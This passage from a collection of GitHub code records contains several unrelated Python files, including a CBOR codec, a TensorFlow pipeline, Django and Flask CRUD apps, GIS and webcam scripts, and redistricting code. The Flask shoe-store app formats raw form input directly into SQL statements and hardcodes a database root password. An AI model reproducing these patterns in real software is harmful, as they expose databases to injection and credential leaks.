if flags & TnvcFlag.VALUE:\n for idx in range(count):\n LOGGER.debug('Decoding TNVC item %d type %s',\n idx, type_enums[idx])\n values.append(self._decode_obj(type_enums[idx], cbordec))\n return values\n\n def _decode_ac_items(self, cbordec):\n # FIXME: workaorund! doesn't scale up\n item = ord(cbordec.read(1))\n count = item & 0x1F\n LOGGER.debug('AC with count %d', count)\n items = []\n for _ in range(count):\n items.append(self._decode_ari(cbordec))\n return items\n\n def _decode_obj(self, type_enum, cbordec):\n if type_enum == StructType.ARI:\n obj = self._decode_ari(cbordec)\n\n elif type_enum == StructType.AC:\n obj = AC(\n items=self._decode_ac_items(cbordec)\n )\n\n elif type_enum == StructType.EXPR:\n obj = EXPR(\n type_enum=StructType(cbordec.decode()),\n items=self._decode_ac_items(cbordec)\n )\n\n elif type_enum == StructType.TNVC:\n # FIXME: there is no distinction in text between AC and TNVC\n obj = AC(items=self._decode_tnvc(cbordec))\n\n elif type_enum in LITERAL_TYPES:\n item = cbordec.decode()\n obj = LiteralARI(type_enum=type_enum, value=item)\n\n else:\n raise ValueError(f'Unhandled param object type: {type_enum}')\n\n return obj\n\n\nclass Encoder:\n ''' The encoder portion of this CODEC. '''\n\n def encode(self, obj: ARI, buf: BinaryIO):\n ''' Encode an ARI into CBOR bytestring.\n\n :param obj: The ARI object to encode.\n :param buf: The buffer to write into.\n '''\n cborenc = cbor2.CBOREncoder(buf)\n self._encode_obj(obj, cborenc, True)\n\n def _encode_obj(self, obj, cborenc, as_ari):\n if isinstance(obj, ReferenceARI):\n self._encode_ref_ari(obj, cborenc)\n\n elif isinstance(obj, AC):\n # FIXME: workaorund! doesn't scale up\n head = bytes([0x80 | len(obj.items)])\n LOGGER.debug('AC encoding header %s', to_diag(head))\n cborenc.write(head)\n for ari in obj.items:\n self._encode_ref_ari(ari, cborenc)\n\n elif isinstance(obj, EXPR):\n cborenc.encode(obj.type_enum.value)\n # FIXME: workaorund! 
doesn't scale up\n head = bytes([0x80 | len(obj.items)])\n LOGGER.debug('EXPR encoding type %s, header %s',\n obj.type_enum.value, to_diag(head))\n cborenc.write(head)\n for ari in obj.items:\n self._encode_ref_ari(ari, cborenc)\n\n elif isinstance(obj, TNVC):\n self._encode_tnvc(obj.items, cborenc)\n\n elif isinstance(obj, LiteralARI):\n if obj.type_enum == StructType.BSTR:\n cborenc.encode(obj.value)\n return\n\n if as_ari:\n flags = (\n ((obj.type_enum - StructType.BOOL) << 4)\n | StructType.LIT\n )\n cborenc.write(struct.pack('!B', flags))\n cborenc.encode(obj.value)\n\n else:\n raise TypeError(f'Unhandled object type {type(obj)} for: {obj}')\n\n def _encode_ref_ari(self, obj, cborenc):\n flags = int(obj.ident.type_enum)\n if obj.ident.namespace is not None:\n flags |= AriFlag.HAS_NN\n if obj.params is not None:\n flags |= AriFlag.HAS_PARAMS\n if obj.ident.issuer is not None:\n flags |= AriFlag.HAS_ISS\n if obj.ident.tag is not None:\n flags |= AriFlag.HAS_TAG\n LOGGER.debug('ReferenceARI encoding flags %s', to_diag(flags))\n cborenc.write(struct.pack('!B', flags))\n\n if obj.ident.namespace is not None:\n cborenc.encode(obj.ident.namespace)\n \n # amp is expecting a bytestring\n cborenc.encode(\n obj.ident.name if isinstance(obj.ident.name, bytes)\n else str(obj.ident.name).encode('utf-8')\n )\n \n if obj.params is not None:\n self._encode_tnvc(obj.params, cborenc)\n if obj.ident.issuer is not None:\n cborenc.encode(obj.ident.issuer)\n if obj.ident.tag is not None:\n cborenc.encode(obj.ident.tag)\n\n def _encode_tnvc(self, params, cborenc):\n LOGGER.debug('TNVC encoding count %s', len(params))\n flags = 0\n if params:\n flags |= TnvcFlag.TYPE | TnvcFlag.VALUE\n cborenc.write(struct.pack('!B', flags))\n\n if flags:\n cborenc.encode(len(params))\n\n for param in params:\n if isinstance(param, ReferenceARI):\n type_enum = StructType.ARI\n elif isinstance(param, AC):\n type_enum = StructType.AC\n elif isinstance(param, EXPR):\n type_enum = StructType.EXPR\n elif isinstance(param, TNVC):\n type_enum = StructType.TNVC\n elif isinstance(param, LiteralARI):\n type_enum = param.type_enum\n else:\n LOGGER.warning(\n 'Unhandled parameter type %s for: %s',\n type(param), param\n )\n cborenc.write(struct.pack('!B', type_enum))\n\n for param in params:\n LOGGER.debug('TNVC encoding item %s', param)\n self._encode_obj(param, cborenc, as_ari=False)\n","repo_name":"NASA-AMMOS/anms-ace","sub_path":"src/ace/ari_cbor.py","file_name":"ari_cbor.py","file_ext":"py","file_size_in_byte":9699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"27147653440","text":"import tensorflow as tf\n\n#Training: Load image, (semi randomly) augmentate the image and subtract per image mean and std\ndef _load_and_preprocess_image_train(image_path, label=None):\n\n image = image_path\n image = tf.io.read_file(image_path)\n image = tf.image.decode_png(image, channels=3)\n image = tf.image.convert_image_dtype(image, tf.float32)\n image = tf.image.random_flip_left_right(image)\n image = tf.image.random_flip_up_down(image)\n\n image = tf.image.per_image_standardization(image)\n \n if label == None:\n return image\n\n else:\n return image, label\n\n#Validation/Test: Load image and subtract per image mean and std\ndef _load_and_preprocess_image_test(image_path, label=None):\n\n image = image_path\n image = tf.io.read_file(image_path)\n image = tf.image.decode_png(image, channels=3)\n\n image = tf.image.convert_image_dtype(image, tf.float32)\n image = tf.image.per_image_standardization(image)\n \n if label == None:\n return image\n\n else:\n return image, label\n\n\n\n#This function generates the image batches\n#if shuffle is True: dataset will be shuffled before batching\n#if predict is True: dataset will not be repeated (important for the last batch in case of predicting the validation/test data)\ndef batch_dataset(dataset, batch_size, shuffle=True, predict=False):\n\n if shuffle == True:\n dataset = dataset.shuffle(buffer_size=20 * 1000 * batch_size)\n \n #For training: augmentate the images (random flip after loading)\n if predict == False:\n dataset = dataset.repeat()\n dataset = dataset.map(_load_and_preprocess_image_train, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n \n #For validation/test: No image augmentation upon creating the batch\n else:\n dataset = dataset.repeat(1)\n dataset = dataset.map(_load_and_preprocess_image_test, num_parallel_calls=tf.data.experimental.AUTOTUNE)\n\n #Create the batch and prefetch\n dataset = dataset.batch(batch_size)\n dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)\n \n return dataset\n","repo_name":"Ay-De/SLM-CNN","sub_path":"CNN/modules/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"2024048779","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Profesionales, Especialidades\nfrom django.contrib.auth.models import User\nfrom .forms import Profesionales_Form, Usuario_Form, Especialidades_Form\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib import messages\n# Create your views here.\n\ndef profesionales_lista(request):\n queryset = Profesionales.objects.all\n if request.user.is_authenticated():\n context = {\n \"title\": \"Mi lista de profesionales\",\n \"object_list\": queryset,\n }\n else:\n context = {\n \"title\": \"Lista / No logueado\"\n }\n return render(request, \"profesionales_lista.html\", context)\n\n\ndef profesionales_detalle(request, id):\n instancia = get_object_or_404(Profesionales, id=id)\n context = {\n \"instancia\": instancia,\n \"nombre\": instancia.Nombre,\n }\n return render(request, \"profesionales_detalle.html\", context)\n\ndef profesionales_crear(request):\n form = Profesionales_Form(request.POST or None)\n if form.is_valid():\n instancia = form.save(commit=False)\n instancia.save()\n messages.success(request, \"Creado Exitosamente!\")\n return HttpResponseRedirect(instancia.get_url_lista())\n context = {\n \"form\": form,\n }\n return render(request, \"profesionales_form.html\", context)\n\n\ndef profesionales_edita(request, id):\n instancia = get_object_or_404(Profesionales,id=id)\n form = Profesionales_Form(request.POST or None, instance=instancia)\n if form.is_valid():\n instancia = form.save(commit=False)\n instancia.save()\n messages.success(request, \"Profesional Actualizado!\")\n\n return HttpResponseRedirect(instancia.get_url_lista())\n context = {\n \"form\": form,\n \"instancia\": instancia,\n }\n\n return render(request, \"profesionales_editar_form.html\", context)\n\n\ndef profesionales_borrar(request, id=None):\n instancia = get_object_or_404(Profesionales, id=id)\n instancia.delete()\n messages.success(request, \"Profesional Borrado!\")\n\n return redirect(\"profesionales:lista\")\n\n\ndef especialidad_crear(request):\n form = Especialidades_Form(request.POST or None)\n if form.is_valid():\n instancia = form.save(commit=False)\n instancia.save()\n messages.success(request, \"Creado Exitosamente!\")\n return HttpResponseRedirect(\"/profesionales\")\n context = {\n \"form\": form,\n }\n return render(request, \"especialidades_form.html\", context)\n","repo_name":"Naukas1/GIP_Final","sub_path":"GIP/Profesionales/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21598242725","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.prev = None\n self.next = None\n\n\nclass LinkedList:\n def __init__(self):\n self.start = None\n\n def display(self):\n current = self.start\n while current is not None:\n print(current.data)\n current = current.next\n\n def is_empty(self) -> bool:\n return not self.start\n\n def prepend(self, data):\n if not self.start:\n self.start = Node(data)\n return\n\n tmp_node = Node(data)\n tmp_node.next = self.start\n self.start.prev = tmp_node\n self.start = tmp_node\n\n def append(self, data):\n if not self.start:\n self.start = Node(data)\n return\n\n last = self.start\n while last.next is not None:\n last = last.next\n\n tmp_node = Node(data)\n last.next = tmp_node\n tmp_node.prev = last\n\n def insert_after(self, target_data, data):\n if self.is_empty():\n raise ValueError(\"The list is empty!\")\n\n found = self.start\n while found is not None:\n if found.data == target_data:\n break\n found = found.next\n\n if not found:\n raise ValueError(f\"There is no element in the list: {data}!\")\n\n tmp_node = Node(data)\n found_last = True if not found.next else False\n if found_last:\n found.next = tmp_node\n tmp_node.prev = found\n else:\n tmp_node.prev = found\n tmp_node.next = found.next\n found.next.prev = tmp_node\n found.next = tmp_node\n\n def insert_before(self, target_data, data):\n if self.is_empty():\n raise ValueError(\"The list is empty!\")\n\n found = self.start\n while found is not None:\n if found.data == target_data:\n break\n found = found.next\n\n if not found:\n raise ValueError(f\"There is no element in the list: {data}!\")\n\n tmp_node = Node(data)\n if found is self.start:\n self.prepend(data)\n else:\n tmp_node.next = found\n tmp_node.prev = found.prev\n found.prev.next = tmp_node\n found.prev = tmp_node\n\n def delete(self, data):\n if self.is_empty():\n raise ValueError(\"The list is empty!\")\n\n found = self.start\n while found is not None:\n if found.data == data:\n break\n found = found.next\n\n if not found:\n raise ValueError(f\"There is no element in the list: {data}!\")\n\n if found is self.start:\n if found.next is None:\n self.start = None\n else:\n self.start = self.start.next\n return\n\n left, right = found.prev, found.next\n left.next = right\n right.prev = left\n\n\nlst = LinkedList()\nlst.append(3)\nlst.prepend(1)\nlst.insert_after(1, 2)\nlst.insert_before(1, 0)\nlst.insert_after(2, 100)\nlst.delete(2)\nlst.display()\n","repo_name":"TheArman/ooad_tasks","sub_path":"5_hmw/1_linked_list.py","file_name":"1_linked_list.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70141727210","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask_mysqldb import MySQL\n\napp = Flask(__name__)\n\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = 'Jocelyn!180'\napp.config['MYSQL_DB'] = 'shoe_store'\n\nmysql = MySQL(app)\n\n# while True:\n# #username = input(\"Enter username: \")\n# #password = input(\"Enter password: \")\n# try:\n# cnx = pymysql.connect(host='localhost', user='root', password='Jocelyn!180', db='shoe_store')\n# cur = cnx.cursor()\n# if cnx:\n# break\n# else:\n# continue\n# except:\n# print('Couldn\\'t connect to the server. Please enter credentials again.')\n#\n\n\n@app.route('/')\ndef ind():\n\n cur = mysql.connection.cursor()\n cur.execute(\"SELECT * FROM employee\")\n data = cur.fetchall()\n cur.close()\n\n return render_template('index.html', employees = data)\n\n\n@app.route('/insert', methods=['POST'])\ndef insert():\n if request.method == \"POST\":\n employee_id = request.form['employee_id']\n salary = request.form['salary']\n first_name = request.form['first_name']\n last_name = request.form['last_name']\n start_date = request.form['start_date']\n branch_id = request.form['branch_id']\n job_title = request.form['job_title']\n\n cur = mysql.connection.cursor()\n\n ins_st = '''INSERT INTO employee (employee_id, salary, first_name, last_name,\n start_date, branch_id, job_title) VALUES ('{}', '{}', '{}', '{}', '{}','{}', '{}')'''.format(employee_id, salary, first_name, last_name, start_date, branch_id, job_title)\n print(ins_st)\n cur.execute(ins_st)\n\n mysql.connection.commit()\n return redirect(url_for('ind'))\n\n\n@app.route('/update', methods= ['POST', 'GET'])\ndef update():\n if request.method == \"POST\":\n employee_id = request.form['employee_id']\n salary = request.form['salary']\n first_name = request.form['first_name']\n last_name = request.form['last_name']\n start_date = request.form['start_date']\n branch_id = request.form['branch_id']\n job_title = request.form['job_title']\n\n cur = mysql.connection.cursor()\n\n ins_st = '''UPDATE employee SET salary='{}', first_name='{}', last_name='{}',\n start_date='{}', branch_id='{}', job_title='{}' \n WHERE employee_id='{}' '''.format(salary, first_name, last_name, start_date, branch_id, job_title, employee_id)\n cur.execute(ins_st)\n mysql.connection.commit()\n return redirect(url_for('ind'))\n\n\n@app.route('/delete/', methods = ['POST', 'GET'] )\ndef delete(employee_id):\n\n cur = mysql.connection.cursor()\n cur.execute(\"DELETE FROM employee WHERE employee_id = %s\", [employee_id])\n mysql.connection.commit()\n return redirect(url_for('ind'))\n\n\nif __name__ == \"__main__\":\n # had app.run(debug=True) before for debugging purposes.\n app.run()\n","repo_name":"kevingzheng/ShoeStoreDB","sub_path":"shoe_store_project/FlaskCrudApplication/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"32235914907","text":"########################################################################################################################\n# File name: 2a_NEON_gridded_point_count_at_h_to_minimum_bounding_volume.py\n# Author: Mike Gough\n# Date created: 06/05/2023\n# Python Version: 3.x\n# Description:\n# Calculates the minimum bounding volume for a set of pre-processed LiDAR point returns.\n# Requires a fishnet with X,Y coordinates of the centroid (spatial join with fishnet labels), and a set of input points\n# with a z value and height_above_ground.\n########################################################################################################################\n\nimport arcpy\nimport math\narcpy.env.overwriteOutput = True\n\ninput_fishnet_with_xy = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Inputs\\Volume\\Vector_Fishnets.gdb\\Fishnet_LiDAR_Point_Extent_1_Tower_Location_For_Volume_Calculation_Join_XY\"\ninput_point_with_z = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Intermediate\\Volume\\Volume.gdb\\Lidar_Points_with_Elevation_Extent_1_Tower_Location\"\nintersect_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Intermediate\\Volume\\Volume.gdb\\LiDAR_Points_with_X_Y_Z_Index\"\n\n#output_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_envelope\"\n#output_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_sphere\"\n#output_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_convex_hull\"\noutput_fc = r\"G:\\CALFIRE_Decision_support_system_2021_mike_gough\\Tasks\\NEON\\Data\\Outputs\\Outputs.gdb\\minimum_bounding_volume_concave_hull\"\n\nprint(\"Intersecting Fishnet and Input Points\")\narcpy.Intersect_analysis([input_point_with_z, input_fishnet_with_xy], intersect_fc, \"ALL\")\narcpy.AddField_management(intersect_fc, \"Z_Index\")\n\nprint(\"Removing ground points. Adding integer based Z-Index\")\nwith arcpy.da.UpdateCursor(intersect_fc, [\"Z_Max\", \"height_from_ground\", \"Z_Index\"]) as uc:\n for row in uc:\n z_index = math.floor(row[1])\n if z_index == 0:\n uc.deleteRow()\n else:\n row[2] = z_index\n uc.updateRow(row)\n\n# Notes: Sphere creates volumes that extend beyond the 3D cubes.\narcpy.ddd.MinimumBoundingVolume(intersect_fc, \"Z_Max\", output_fc, \"CONCAVE_HULL\", \"LIST\", \"POINT_X;POINT_Y;Z_Index\", \"MBV_FIELDS\")\n\narcpy.AddField_management(output_fc, \"MBV_Percent\", \"DOUBLE\")\n\nwith arcpy.da.UpdateCursor(output_fc, [\"MBV_Volume\", \"MBV_Percent\"]) as uc:\n for row in uc:\n volumetric_percent = row[0] / 1 * 100\n row[1] = volumetric_percent\n uc.updateRow(row)\n\n\n\n","repo_name":"consbio/CALFIRE-Decision-support-system-2021-Wind","sub_path":"2a_NEON_gridded_point_count_at_h_to_minimum_bounding_volume.py","file_name":"2a_NEON_gridded_point_count_at_h_to_minimum_bounding_volume.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30656699262","text":"import tensorflow # 딥러닝\nimport numpy as np # 수치계산\nimport cv2 # opencv2\nimport pyautogui # 마우스 x, y 좌표 확인용\nimport time # 시간 사용\n\nWINDOW_NAME = 'plasticBottleHelper'\ncheck_screen = 1 # 1: 카메라 화면, 2: 라벨 X, 3: 라벨 O\nprev_time = 0\nFPS = 10\nprediction_value = 0.98\n\n# 모델 위치\nmodel_filename = '/plasticBottleHelper/converted_keras/keras_model.h5'\nimg_filename1 = '/plasticBottleHelper/image1.png'\nimg_filename2 = '/plasticBottleHelper/image2.png'\n\n# 케라스 모델 가져오기\nmodel = tensorflow.keras.models.load_model(model_filename)\n\n# 카메라를 제어할 수 있는 객체\n# 외부 웹캠으로 비디오 캡처 초기화\ncapture = cv2.VideoCapture(1)\n# 외부 웹캠이 없다면 내장 웹캠을 사용\nif not capture.read()[0]:\n capture = cv2.VideoCapture(0)\n\n# Full screen mode\ncv2.namedWindow(WINDOW_NAME, cv2.WINDOW_NORMAL)\ncv2.setWindowProperty(WINDOW_NAME, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n\n# 마우스 이벤트\ndef mouse_event(event, x, y, flags, param): \n global check_screen\n \n if event == cv2.EVENT_LBUTTONDOWN:\n if (check_screen != 1) & (1280 < X < 2515) & (1140 < Y < 1412):\n check_screen = 1\n\nwhile True:\n # 프레임 계산 10fps\n current_time = time.time() - prev_time\n \n if check_screen == 1:\n # 비디오를 한 프레임씩 읽기\n ret, frame = capture.read()\n if not ret:\n break\n\n # 비디오 좌우 반전\n # frame = cv2.flip(frame, 1)\n # 비디오 상하 반전\n # frame = cv2.flip(frame, 0)\n\n # 비디오 크기 재설정\n frame_resize = frame[:, 80:80+frame.shape[0]]\n frame_input = cv2.resize(frame_resize, (224, 224))\n\n frame_input = cv2.cvtColor(frame_input, cv2.COLOR_BGR2RGB)\n frame_input = (frame_input.astype(np.float32) / 127.0) - 1\n frame_input = np.expand_dims(frame_input, axis=0)\n\n prediction = model.predict(frame_input)\n \n cv2.rectangle(frame, (80, 0), (80+frame.shape[0], frame.shape[0]), (0, 0, 255), 5)\n cv2.putText(frame, str(round(prediction[0, 0], 5)), (10, 30), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, str(round(prediction[0, 1], 5)), (10, 50), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, str(round(prediction[0, 2], 5)), (10, 70), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n \n else:\n X, Y = pyautogui.position()\n H, W = frame.shape[:2]\n \n if check_screen == 2:\n frame = cv2.imread(img_filename1)\n else: # if check_screen == 3:\n frame = cv2.imread(img_filename2)\n \n # 버튼 \n cv2.setMouseCallback(WINDOW_NAME, mouse_event, frame)\n cv2.putText(frame, \"X : \" + str(X), (10, 30), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, \"Y : \" + str(Y), (10, 50), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, \"H : \" + str(H), (10, 70), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n cv2.putText(frame, \"W : \" + str(W), (10, 90), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0))\n\n # 종료 버튼 0xFF == 64bit\n if cv2.waitKey(1) & 0xFF == ord('q'):\n check_screen = 1\n\n if(prediction[0, 0] > prediction[0, 1]):\n if (prediction[0, 0] > prediction_value):\n check_screen = 2\n prediction[0, 0] = 0\n prediction[0, 1] = 0\n\n if(prediction[0, 1] > prediction[0, 0]):\n if (prediction[0, 1] > prediction_value):\n check_screen = 3\n prediction[0, 0] = 0\n prediction[0, 1] = 0\n\n # 출력\n if (ret is True) & (current_time > 1./ FPS) :\n prev_time = time.time()\n cv2.imshow(WINDOW_NAME, frame)\n\n# 비디오 캡처 개체 해제\ncapture.release()\ncv2.destroyAllWindows()","repo_name":"mikwain09/plastic_bottle_helper","sub_path":"plastic_bottle_helper.py","file_name":"plastic_bottle_helper.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33207814597","text":"import psycopg2\nimport os\nfrom Connection import Connection\nimport urllib.parse as up\n\n\nclass ElephantConnection(Connection):\n\n def __init__(self):\n super().__init__()\n\n def connect(self):\n try:\n\n # read connection parameters\n params = self.config(section='elephantsql')\n\n up.uses_netloc.append(\"postgres\")\n super().conn = psycopg2.connect(\n database=params['database'],\n user=params['user'],\n password=params['password'],\n host=params['host'],\n port=params['port']\n )\n print('Connect to the PostgreSQL on ElephantSQL successfully')\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n","repo_name":"chirunnuj/python-database-tutorial","sub_path":"ElephantConnection.py","file_name":"ElephantConnection.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"166286422","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 28 15:50:57 2020\n\n@author: darac\n\"\"\"\nimport random\nimport networkx as nx\nimport csv\nimport os\nimport shutil\nfrom functools import partial\nimport json\nimport math\nimport numpy as np\nimport geopandas as gpd\nimport matplotlib\n# matplotlib.use('Agg')\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport pandas as pd\nimport collections\nfrom enum import Enum\nimport re\nimport scipy\nfrom scipy import stats\nimport time\nimport heapq\nimport operator\n\n\n# modification of https://github.com/mggg/VRA_ensembles/TX/run_functions.py\n\n\nDIR = ''\n\n\ndef precompute_state_weights(num_districts, elec_sets, elec_set_dict, recency_W1, EI_statewide, primary_elecs, \\\n runoff_elecs, elec_match_dict, min_cand_weights_dict, cand_race_dict):\n \"\"\"\n Returns election weights for state and equal scores for Black, Latino and Neither\n effectivness. Election weights are the same across districts for these scores, as they \n use statewide candidate preferences (and all weights = 1 for the equal score). It also returns\n dataframes of statewide Latino and Black-preferred candidates in primaries and runoffs.\n \"\"\"\n black_pref_cands_prim_state = pd.DataFrame(columns=range(num_districts))\n black_pref_cands_prim_state[\"Election Set\"] = elec_sets\n hisp_pref_cands_prim_state = pd.DataFrame(columns=range(num_districts))\n hisp_pref_cands_prim_state[\"Election Set\"] = elec_sets\n black_pref_cands_runoffs_state = pd.DataFrame(columns=range(num_districts))\n black_pref_cands_runoffs_state[\"Election Set\"] = elec_sets\n hisp_pref_cands_runoffs_state = pd.DataFrame(columns=range(num_districts))\n hisp_pref_cands_runoffs_state[\"Election Set\"] = elec_sets\n\n black_ei_prob = [EI_statewide.loc[((EI_statewide[\"Election\"] == elec_set_dict[elec_set]['Primary']) & \\\n (EI_statewide[\"Demog\"] == 'BCVAP')), \"prob\"].values[0] \\\n for elec_set in elec_sets]\n\n black_ei_conf = [prob_conf_conversion(x) for x in black_ei_prob]\n black_conf_W3_state = np.tile(black_ei_conf, (num_districts, 1)).transpose()\n\n hisp_ei_prob = [EI_statewide.loc[((EI_statewide[\"Election\"] == elec_set_dict[elec_set]['Primary']) &\n (EI_statewide[\"Demog\"] == 'HCVAP')), \"prob\"].values[0]\n for elec_set in elec_sets]\n\n hisp_ei_conf = [prob_conf_conversion(x) for x in hisp_ei_prob]\n hisp_conf_W3_state = np.tile(hisp_ei_conf, (num_districts, 1)).transpose()\n\n neither_ei_conf = [prob_conf_conversion(x * y) for x, y in zip(black_ei_prob, hisp_ei_prob)]\n neither_conf_W3_state = np.tile(neither_ei_conf, (num_districts, 1)).transpose()\n\n # pre-compute W2 and W3 for statewide/equal modes\n for elec in primary_elecs + runoff_elecs:\n black_pref_cand = \\\n EI_statewide.loc[((EI_statewide[\"Election\"] == elec) & (EI_statewide[\"Demog\"] == 'BCVAP')), \"Candidate\"].values[\n 0]\n hisp_pref_cand = \\\n EI_statewide.loc[((EI_statewide[\"Election\"] == elec) & (EI_statewide[\"Demog\"] == 'HCVAP')), \"Candidate\"].values[\n 0]\n\n for district in range(num_districts):\n if elec in primary_elecs:\n black_pref_cands_prim_state.at[\n black_pref_cands_prim_state[\"Election Set\"] == elec_match_dict[elec], district] = black_pref_cand\n hisp_pref_cands_prim_state.at[\n hisp_pref_cands_prim_state[\"Election Set\"] == elec_match_dict[elec], district] = hisp_pref_cand\n\n else:\n black_pref_cands_runoffs_state.at[\n black_pref_cands_runoffs_state[\"Election Set\"] == elec_match_dict[elec], district] = 
black_pref_cand\n hisp_pref_cands_runoffs_state.at[\n hisp_pref_cands_runoffs_state[\"Election Set\"] == elec_match_dict[elec], district] = hisp_pref_cand\n\n min_cand_black_W2_state, min_cand_hisp_W2_state, min_cand_neither_W2_state = compute_W2(elec_sets, \\\n range(num_districts),\n min_cand_weights_dict,\n black_pref_cands_prim_state,\n hisp_pref_cands_prim_state,\n cand_race_dict)\n\n # compute final election weights (for statewide and equal scores) by taking product of W1, W2,\n # and W3 for each election set and district #Note: because these are statewide weights,\n # an election set will have the same weight across districts\n black_weight_state = recency_W1 * min_cand_black_W2_state * black_conf_W3_state\n hisp_weight_state = recency_W1 * min_cand_hisp_W2_state * hisp_conf_W3_state\n neither_weight_state = recency_W1 * min_cand_neither_W2_state * neither_conf_W3_state\n\n # equal-score weights are all 1\n black_weight_equal = np.ones((len(elec_sets), num_districts))\n hisp_weight_equal = np.ones((len(elec_sets), num_districts))\n neither_weight_equal = np.ones((len(elec_sets), num_districts))\n\n return black_weight_state, hisp_weight_state, neither_weight_state, black_weight_equal, \\\n hisp_weight_equal, neither_weight_equal, black_pref_cands_prim_state, hisp_pref_cands_prim_state, \\\n black_pref_cands_runoffs_state, hisp_pref_cands_runoffs_state\n\n\ndef compute_district_weights(dist_changes, elec_sets, elec_set_dict, state_gdf, partition, prec_draws_outcomes, \\\n geo_id, primary_elecs, runoff_elecs, elec_match_dict, bases, outcomes, \\\n recency_W1, cand_race_dict, min_cand_weights_dict):\n \"\"\"\n Returns election weights for the district score for Black, Latino and Neither\n effectiveness. Election weights differ across districts, as it uses district-specific preferred\n candidates. 
It also returns dataframes of district-specific\n Latino and Black-preferred candidates in primaries and runoffs.\n \"\"\"\n\n black_pref_cands_prim_dist = pd.DataFrame(columns=dist_changes)\n black_pref_cands_prim_dist[\"Election Set\"] = elec_sets\n hisp_pref_cands_prim_dist = pd.DataFrame(columns=dist_changes)\n hisp_pref_cands_prim_dist[\"Election Set\"] = elec_sets\n # store runoff preferences for instances where minority-preferred candidate needs to switch between primary and runoff\n black_pref_cands_runoffs_dist = pd.DataFrame(columns=dist_changes)\n black_pref_cands_runoffs_dist[\"Election Set\"] = elec_sets\n hisp_pref_cands_runoffs_dist = pd.DataFrame(columns=dist_changes)\n hisp_pref_cands_runoffs_dist[\"Election Set\"] = elec_sets\n\n black_conf_W3_dist = np.empty((len(elec_sets), 0), float)\n hisp_conf_W3_dist = np.empty((len(elec_sets), 0), float)\n neither_conf_W3_dist = np.empty((len(elec_sets), 0), float)\n\n for district in dist_changes:\n state_gdf[\"New Map\"] = state_gdf.index.map(dict(partition.assignment))\n dist_prec_list = list(state_gdf[state_gdf[\"New Map\"] == district][geo_id])\n dist_prec_indices = state_gdf.index[state_gdf[geo_id].isin(dist_prec_list)].tolist()\n district_support_all = cand_pref_outcome_sum(prec_draws_outcomes, dist_prec_indices, bases, outcomes)\n\n black_pref_prob_single_dist = []\n hisp_pref_prob_single_dist = []\n\n for elec_set in elec_sets:\n HCVAP_support_elec = district_support_all[('HCVAP', elec_set_dict[elec_set]['Primary'])]\n hisp_pref_cand_dist = max(HCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n hisp_pref_prob_dist = HCVAP_support_elec[hisp_pref_cand_dist]\n hisp_pref_prob_single_dist.append(hisp_pref_prob_dist)\n\n BCVAP_support_elec = district_support_all[('BCVAP', elec_set_dict[elec_set]['Primary'])]\n black_pref_cand_dist = max(BCVAP_support_elec.items(), key=operator.itemgetter(1))[0]\n black_pref_prob_dist = BCVAP_support_elec[black_pref_cand_dist]\n black_pref_prob_single_dist.append(black_pref_prob_dist)\n\n black_pref_cands_prim_dist.at[\n black_pref_cands_prim_dist[\"Election Set\"] == elec_set, district] = black_pref_cand_dist\n hisp_pref_cands_prim_dist.at[\n hisp_pref_cands_prim_dist[\"Election Set\"] == elec_set, district] = hisp_pref_cand_dist\n\n if 'Runoff' in elec_set_dict[elec_set].keys():\n HCVAP_support_elec = 